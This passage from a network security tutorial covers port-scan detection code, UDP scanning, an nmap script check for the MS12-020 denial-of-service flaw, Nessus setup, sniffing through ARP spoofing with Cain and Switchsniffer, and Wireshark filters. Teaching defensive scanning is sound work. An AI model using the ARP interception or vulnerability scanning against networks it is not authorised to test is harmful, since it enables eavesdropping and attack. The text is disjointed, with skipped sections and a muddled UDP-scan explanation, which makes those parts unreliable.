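    Anything else (SYN/ACK, PSH/ACK, ...) is treated as ordinary traffic."""
    if flags == 0:
        return "NULL"
    if flags == FIN | PSH | URG:
        return "XMAS"
    if flags == FIN:
        return "FIN"
    if flags == SYN:
        return "SYN"
    if flags == ACK:
        return "ACK"
    return "other"


def parse_record(line: str):
    """Constructed record format: '<src_ip> <dst_ip> <dst_port> <flags_hex>'."""
    src, dst, dport, flags = line.split()
    return src, dst, int(dport), int(flags, 16)


def detect_scanners(records, min_ports: int = 10) -> dict:
    """Return {src: {probe_type: number of distinct (dst, port) targets}} for
    every source whose probe-type packets reached at least min_ports distinct
    targets. A normal client sends SYNs too, but only to the few ports it uses."""
    per_src = defaultdict(lambda: defaultdict(set))
    for line in records:
        src, dst, dport, flags = parse_record(line)
        kind = probe_type(flags)
        if kind == "other":
            continue
        per_src[src][kind].add((dst, dport))
    findings = {}
    for src, kinds in per_src.items():
        targets = set().union(*kinds.values())
        if len(targets) >= min_ports:
            findings[src] = {k: len(v) for k, v in kinds.items()}
    return findings


# Constructed sample: one host sweeping ports 1-30 with SYN probes plus a few
# NULL probes, one ordinary client talking to port 80, and the server's reply.
SAMPLE = [f"10.0.0.9 10.0.0.5 {p} 02" for p in range(1, 31)]
SAMPLE += [f"10.0.0.9 10.0.0.5 {p} 00" for p in range(20, 26)]
SAMPLE += [
    "10.0.0.7 10.0.0.5 80 02",     # client SYN
    "10.0.0.5 10.0.0.7 51000 12",  # server SYN/ACK
    "10.0.0.7 10.0.0.5 80 18",     # client PSH/ACK carrying data
]

if __name__ == "__main__":
    print(detect_scanners(SAMPLE))
```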
b.2. UDP Scan
Whereas packets sent over TCP are guaranteed to arrive intact at their destination, packets sent over UDP serve the need for fast transfer of small packets. With the TCP transfer process, an attacker can easily scan which ports a system has open based on the flags in the TCP packet.
UDP packet structure
As can be seen, the UDP packet carries no flags, so the TCP port-scanning methods cannot be used for UDP. Unfortunately, most systems allow ICMP packets through.
If a port is closed, when the server receives the ICMP packet from the client it tries to send back an ICMP type 3 code 3 (port unreachable) message to the client. When performing a UDP scan, be prepared to receive results that are not very reliable.
In addition, nmap offers options to write the results to many different file formats.
2. Scanning for OS vulnerabilities
a. Using Nmap to scan for OS vulnerabilities
Nmap uses a set of signatures for vulnerability scanning called the Nmap Scripting Engine. Each Nmap Scripting Engine file (.nse) scans for one kind of vulnerability.
Below I show how to scan for the MS12-020 vulnerability, which allows a DoS attack that hangs Windows 7, 2008, Vista, XP and 2003 systems.
Step 1: search Google for "search ms12-020 by nmap"
Step 2: download the Nmap Scripting Engine file (.nse)
Step 3: install nmap 6
Step 4: scan with nmap using the following command (the .nse file is in the E:\tocbatdat folder):
nmap -sC -p 3389 -v -v --script-trace --script "E:\\tocbatdat\\ms12-020-rev.nse" IP_Scan
Step 5: When Nmap reports as follows, the vulnerability is present
(the machine at IP address 192.168.0.77 has the MS12-020 vulnerability)
Installation:
Click Next to continue; if you do not have an Activation Code yet, click register:
Before scanning we configure a Policy for the scan: click the Policy tab. By default the system comes with some policies such as Web App Test and PCI.
Click the Internal Network Scan policy and choose Edit; we configure it to scan a Windows Server. Set the scan parameters.
After the policy is set up, switch to the Scan tab and add the host to scan:
Choose Launch Scan
Result when the scan completes: the system produces a Report with the number of vulnerabilities, open ports, OS, services, the names of the vulnerabilities and remediation guidance.
OS vulnerabilities
c. Hub environment
A hub is a single collision domain, so capturing traffic on the network is completely straightforward. For unencrypted communications, the information is easily read.
d. Sniffing in a switched environment
A switch uses its MAC address table to forward frames to specific ports.
NE-SW1#show mac address-table
          Mac Address Table
-------------------------------------------

Vlan    Mac Address       Type        Ports
----    -----------       --------    -----
 All    0100.0ccc.cccc    STATIC      CPU
 All    0100.0ccc.cccd    STATIC      CPU
 All    0180.c200.0000    STATIC      CPU
 All    0180.c200.0001    STATIC      CPU
 All    0180.c200.0002    STATIC      CPU
 All    0180.c200.0003    STATIC      CPU
 All    0180.c200.0004    STATIC      CPU
 All    0180.c200.0005    STATIC      CPU
 All    0180.c200.0006    STATIC      CPU
 All    0180.c200.0007    STATIC      CPU
 All    0180.c200.0008    STATIC      CPU
 All    0180.c200.0009    STATIC      CPU
 All    0180.c200.000a    STATIC      CPU
 All    0180.c200.000b    STATIC      CPU
 All    0180.c200.000c    STATIC      CPU
 All    0180.c200.000d    STATIC      CPU
 All    0180.c200.000e    STATIC      CPU
 All    0180.c200.000f    STATIC      CPU
 All    0180.c200.0010    STATIC      CPU
So for a machine to sniff in a switched environment it must do one of the following:
- Legitimate sniffing: configure a monitor port (Port Monitor) on the switch; the traffic of whichever port or VLAN is to be monitored is copied to that port.
- MAC spoofing: flood the MAC address table on the switch (this approach is relatively difficult).
Click Start to launch the ARP attack; after the ARP attack, all traffic between the attacked computer and the gateway passes through this computer.
e. Sniffer model using an ARP attack tool
Figure: Router, Switch, VM1 and VM2; VM2 has the sniffer tools Wireshark, Cain and Colasoft installed
The attack model consists of two virtual machines:
- Virtual machine VM1 has the Switchsniffer tool installed to carry out the ARP attack, so that all traffic from the attacked machine passes through VM1 before reaching the network.
- Virtual machine VM2 is bridged on the same hub as VM1, so every packet that enters VM1 is also received by VM2; on VM2 the sniffer tools Colasoft, Wireshark and Cain & Abel are installed to capture the network traffic.
5. The Metasploit exploitation tool
a. Overview of Metasploit
c. Conclusion
The Metasploit Framework is an effective tool for carrying out network security testing of a system. The Metasploit Framework provides scanning and exploitation tools and produces reports on the vulnerabilities found.
6. Using Wireshark and Colasoft to analyze packets
After building the sniffer model above, install the sniffer tools on VM2 to perform the capture.
d. Using Wireshark to analyze packets and network traffic
Install Wireshark
Once installed, Wireshark lets you set a Capture Filter (selecting only certain IPs, connections or service ports) before capturing, or filter out the information you need after the capture.
Wireshark captures the required information
Select the network interface to capture on and set a Capture Filter so that only what is needed is captured:
src host IP
port
port 53
tcp port 80
tcp portrange 1-500
dst port 80 or dst port 443
(host 192.168.0.1 and host 192.168.0.50) and (port 80 or 443)
After capturing we can filter out the information we need:
ip.addr==IP
to: ip.dst==IP
from: ip.src==IP
except: ip.addr!=IP
port: tcp.port eq 80 or tcp.port eq 443
(ip.addr==IP1 and ip.addr==IP2) and (tcp.port eq 80 or tcp.port eq 443)
Set the view to follow a session (TCP Stream)
Colasoft has supporting features for sniffing; after installation it lets you capture:
- Select one or more network interfaces to capture on
- The current network bandwidth on the capture interface
- Click Start
Session summary
Colasoft also allows more detailed filtering than Wireshark, and with its other features Colasoft is truly a very powerful network traffic analysis tool that can be used in real networks to troubleshoot network incidents.
VII. CONCLUSION
This document gives the reader the most basic concepts of security and information safety as well as more in-depth knowledge. From this knowledge the reader gains an overview of the solutions for building a secure network system. Skill in using scanning and exploitation tools lets administrators detect risks to their systems before hackers can find them.